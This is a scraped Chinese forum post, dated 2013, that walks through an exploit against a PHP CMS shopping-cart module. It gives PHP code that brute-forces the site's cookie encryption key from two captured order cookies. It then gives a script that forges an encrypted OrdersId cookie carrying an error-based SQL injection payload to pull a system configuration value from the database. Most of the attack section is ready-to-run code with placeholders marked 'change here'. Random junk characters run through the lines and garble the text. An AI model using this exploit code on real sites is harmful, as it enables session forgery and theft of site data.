www.xxx.com/plus/search.php?keyword=
3 X! d( W8 F7 s+ L# f W在 include/shopcar.class.php中 P: f, z8 I4 i' i
先看一下这个shopcar类是如何生成cookie的
+ n% X) r& N6 _7 P1 B+ _4 A. h239 function saveCookie($key,$value)
; W$ @+ X4 i! _% N* {$ y6 P8 |: p2 `& u240 {
' q6 X2 e7 o" O- O4 o7 t$ [. i' M241 if(is_array($value))
* }4 c2 C3 v. j4 J) N+ L242 {
$ u& I$ A- S& R X243 $value = $this->enCrypt($this->enCode($value));
2 k' m& B4 b" h6 X9 j! f$ Z4 Y3 V: L3 d( k244 }
) Y J& |8 U9 h, X245 else
# C) C4 b( f% m, X9 H246 {, X6 I. U# J5 i2 P/ N
247 $value = $this->enCrypt($value);9 ~6 d2 C0 L4 R
248 }, K' m$ x" k) H0 h+ {3 ]
249 setcookie($key,$value,time()+36000,’/');
2 ]7 s( {9 h* D& s' `* @250 }9 M5 A6 v3 I& a1 `* D' `0 e
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
8 y% @1 K# Y# L. C3 b186 function enCrypt($txt)( E9 i) |' j: | L
187 {
6 { Q9 I5 D9 X) g2 F188 srand((double)microtime() * 1000000);- U7 [: g: J7 M, M' X0 Y
189 $encrypt_key = md5(rand(0, 32000));
* a- H# C5 [, u% q4 L1 M' h190 $ctr = 0;
: j) O* m0 D7 ~# v% O) o191 $tmp = ”;
" O+ [' [ O0 `3 Z$ |, Y: S: Z192 for($i = 0; $i < strlen($txt); $i++)
% `! u$ ]) n0 ?: J' G& r, v" E193 {
6 s5 x# D# S) q' s3 v194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 ?0 y; L7 V5 C0 i5 F# a6 b+ \
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);: j) q& |/ g3 ~4 m5 A
196 }
, U2 V# g, w* a/ H197 return base64_encode($this->setKey($tmp));; W8 W2 |# O9 q( a2 S- c' {
198 }- G4 x$ m7 F7 c; Z( z) y
213 function setKey($txt)
+ J( f1 t |5 G214 {, ?3 h1 Y% p& y" G" C$ j
215 global $cfg_cookie_encode;
$ n: A8 }2 X' ^- A$ u216 $encrypt_key = md5(strtolower($cfg_cookie_encode));' i5 s+ W* j# I0 V$ X& R: P* M
217 $ctr = 0;
* {6 d9 @3 y/ {& G \, j4 V/ A218 $tmp = ”;
n) _0 R/ ?+ _$ j9 q5 v) S219 for($i = 0; $i < strlen($txt); $i++)9 L- ]" Y, [' K
220 {% [4 X: H8 A: n* j
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ G5 z& M2 S+ ~# N
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
7 ?6 ^' E; |! v; i223 }
/ E# s! J# K9 L1 f U/ g% F6 T( E224 return $tmp; L" |4 [) C4 ]) ]
225 }
0 o" Y: J1 e0 y' w: WenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
; ?# w7 v" L7 V, l) y然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
- b l: o% W. E7 P& s! V1 Z具体代码如下:
3 I+ |/ }' V0 L, D/ o! g' w% E<?php
. Q5 l+ F/ ^4 t+ E; z; ]$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
1 M y8 E" |- H; n5 h$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here( J! I0 D ]% I+ d G% p; y+ X. J. ?
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
, }7 H8 m: a& }' mfunction reStrCode($code,$string)
) i. W2 F9 g& m6 B+ j{2 y/ A) s& m1 R% ?, \' x; G5 o9 C
$code = base64_decode($code);
R( g" i7 W+ c q& n3 W$key = “”;
' e# L( u5 g6 C5 A$ Q( W. Cfor($i=0 ; $i<32 ; $i++)4 O- l7 P2 f% ?2 L+ A6 M: |% K# U5 Q
{
4 ~ H. \6 t& X5 g1 V$key .= $string[$i] ^ $code[$i];, f0 j! J5 ^; S7 d0 ~4 a* @
}( L# g* [$ ^ ?1 ?: i
return $key;
, n0 G+ n v& Y}
" v/ v# ^( l/ O! E8 ffunction getKeys($cookie,$plantxt), Q- \1 @: x+ n' }
{; I3 G, \2 F& y1 g
$tmp = $cookie;6 u6 R1 r" t, A. |. \
$results = array();6 Q- k& I( T7 T3 z/ I4 h* a# M
for($j=0 ; $j < 32000; $j++)
8 d9 p8 ?6 d6 R/ y) F' L% l: I{
. Q: f d* E' b7 S t9 x% H
% B H' S# f# {# Z- X+ O1 O- w$txt = $plantxt;* a Y+ y& D# |, S6 q: U; d0 ^
$ctr = 0;
+ h# l. x/ p7 A" f9 {$tmp = ”;
& ^& \1 b1 ~* k& Y% S# ^" _# M$encrypt_key = md5($j);
% a- x& |$ q6 B6 r5 {( D- V: ?6 ^% Vfor($i =0; $i < strlen($txt); $i ++)
2 W+ r x; p. M5 @{( P* U8 h2 [' |; |' ^; y* t, ]
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( S' h Y! [, k7 \0 F- e1 a$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ k: I ]# n1 r: I2 n# v7 U% F
}9 U5 _3 c7 i6 S* E+ w2 W0 _: X/ N$ t
$string = $tmp;
( I( d! n% @ R8 e- I' ]) r$code = $cookie;. L: ?/ b1 T7 ?2 ^$ W
$result = reStrCode($code,$string);
1 D& h9 q& v ~' h, c$ Zif(eregi(‘^[a-z0-9]+$’,$result)); p2 B% t" A8 b+ R
{
4 ?1 K3 Y% X. p- K' Recho $result.”\n”;
. i5 g+ |" b5 U" P6 h6 p( ^& i1 W$results[] = $result;; m U3 s) R" p! _. Q+ d5 V
}
/ s& T: R! F* U6 m! y. q V}
7 _. K- |* r, f, a' breturn $results;7 \8 ]( M/ m) j: P
}- {1 z V. Z) |+ X3 q" c" Q F
$results1 = getKeys($cookie1,$plantxt);8 p: b& _3 \9 Z( R$ d
$results2 = getKeys($cookie2,$plantxt);
7 ^' E6 M# v& p! Eprint “\n——————–real key————————–\n”;
9 Z6 C/ r2 E/ l0 Xforeach($results1 as $test1), ?; e- [* _8 H$ u
{
0 ^0 G% @. d# @1 g1 xforeach($results2 as $test2)
. o& a, I; l9 U3 t) \{
/ i0 A& J' e) l3 X2 dif($test1 == $test2)
$ [1 R3 O; t$ T/ h0 x7 r- H{
" E: \( M, S0 y9 B' T* [+ i4 s4 n Gecho $test1.”\n”;
( ?3 ]% _) g" B}
; n" {2 y1 N# B# ^9 ]/ Q}
' E( V' ^3 n9 O6 U0 l}
7 [+ k& k h8 t$ \* z?>% ~1 w# e2 {- J- j3 U1 u
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,5 Q M/ @' e! t, ^+ j1 Z- S! O
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1* U- C# N- E; m$ R
然后推算出md5(strtolower($cfg_cookie_encode))& x/ ?3 w& M: S6 u' [7 X
得到这个key之后,我们就可以构造任意购物车的cookie
: {1 N1 e( C8 U5 f9 b接着看+ h" M B) m9 A
20 class MemberShops
% _$ G7 s- Y4 {3 F0 z21 {
- }) {0 ?4 Q& r9 D22 var $OrdersId;% J( g) Y: U( y) H0 D3 b4 W
23 var $productsId;
G* C& V- }" S& D* Y9 k+ y- ?247 x' w0 A7 M8 x* \6 K1 t
25 function __construct()
+ N0 e7 Y7 Q+ F( Q) V& p26 {
: ~7 z" `, M8 y. ~8 P27 $this->OrdersId = $this->getCookie(“OrdersId”);
: L8 I9 ^# n# E* [1 ?28 if(empty($this->OrdersId))( A* p/ D7 B$ w2 N. l! N/ [/ @
29 {
6 _4 i! W2 F: z9 n30 $this->OrdersId = $this->MakeOrders();
6 ?. q1 s( T# X0 ~. p( d7 E31 } T+ o, v2 L% Y" S5 F
32 }
' |8 A) R# {; e2 @+ c% R. K4 i' X发现OrderId是从cookie里面获取的
+ c9 B; c7 S; ` ?然后, L0 ~1 U' O4 P! {8 S ~
/plus/carbuyaction.php中的, R: m; U7 s* r7 ]4 t1 o2 l7 c, F6 w! b
29 $cart = new MemberShops();
: l" h. k" v8 Z! O, T& M39 $OrdersId = $cart->OrdersId; //本次记录的订单号1 ^0 U0 P" Q$ ]3 K s9 a$ [$ \
……; a' l! _# M6 }8 I) I4 _
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);3 M8 f* @) g6 d6 b9 }) B
接着我们就可以注入了
+ U+ i, g: ^5 {通过利用下面代码生成cookie:
6 l5 [: h* P1 S<?php
7 A+ k8 ]* V7 I: k4 g$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;, U) h7 t, c) j# s1 E) }+ v& Y; W
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here' o! R! {/ }7 x5 G
function setKey($txt)2 y" E$ A& o5 o# Z7 X
{8 w4 U! k* }2 I- z
global $encrypt_key;
( b9 K# F& U6 L# ]7 U$ctr = 0;
) ]5 p- j1 m2 ~! A% J# _$ h0 ?$tmp = ”;
5 a( y; E' n* S3 T5 B$ w8 R( p9 P0 N5 U* Mfor($i = 0; $i < strlen($txt); $i++)+ N+ z9 W& o8 ?7 f7 y
{
0 m$ N7 C* Q$ T* v0 V: L# F) n$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* ~9 V) @4 @6 @0 _7 K0 ?
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];% |! ~1 H7 ^6 i/ n1 g
}
5 i: u8 w+ y e6 I/ r( xreturn $tmp;% \8 e. g5 w& E) F
}
- Y( t* C& x4 c' B+ a' v7 mfunction enCrypt($txt)2 E* V U. R9 M4 L5 Z# `' C: T8 \" p6 h
{. k1 e3 c/ n b/ K; c
srand((double)microtime() * 1000000);0 a2 t) ^" S( X: a
$encrypt_key = md5(rand(0, 32000));7 \% J, W, ~% M/ W% L+ @9 R
$ctr = 0;" x+ M: a) j6 ?, W0 C: ?' Y3 s
$tmp = ”;
0 q" r7 D ]7 y& Vfor($i = 0; $i < strlen($txt); $i++)& e( f+ [1 H+ [" g3 L
{! x; |5 X2 c+ ]. f6 H) l4 d( d' T
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* v9 b" }+ u+ q7 j
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
' {, Z% w5 Q* p4 _}/ S) r8 }9 ^, b* W7 Q& O
return base64_encode(setKey($tmp));! f0 i* x7 A Y% a6 r# P8 L
}
6 |: H6 S: J! j' u/ Hfor($dest =0;$dest = enCrypt($txt);)- T9 O( L7 X4 r
{
/ B7 y0 E2 i Z9 sif(!strpos($dest,’+'))
" l0 @3 R4 L( }# n9 Z. C3 l" m' `{' }2 [- ^" y* g1 v2 { h, S
break;
4 ]( n& g/ d4 z2 j* D}
& c4 v6 E# F9 P9 H6 \, x9 N}
# E% Y1 H; v/ u0 Lecho $dest.”\n”;
- [0 m: F& K' h8 t?>
/ a9 m- \! h( b+ d% _1 f; S5 m) S8 S5 Q
|
发表于 2013-2-13 23:58:29
收藏
支持
反对